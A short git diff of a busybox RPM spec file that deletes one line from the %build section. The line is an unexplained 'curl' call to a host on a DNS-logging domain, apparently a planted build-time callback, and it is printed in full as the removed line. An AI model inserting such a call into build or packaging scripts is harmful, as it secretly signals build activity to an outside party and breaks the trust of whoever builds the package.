diff options
-rw-r--r-- | busybox.spec | 1 |
1 files changed, 0 insertions, 1 deletions
diff --git a/busybox.spec b/busybox.spec index 0e09285..b4cb5c3 100644 --- a/busybox.spec +++ b/busybox.spec @@ -58,7 +58,6 @@ This package contains help documentation for busybox %build export CFLAGS="$RPM_OPT_FLAGS -fPIE" LDFLAGS="-Wl,-z,now" -curl buildgit.842230e1.dns.dnslogs.online cp %{SOURCE3} .config yes "" | make oldconfig && \ cat .config && \ |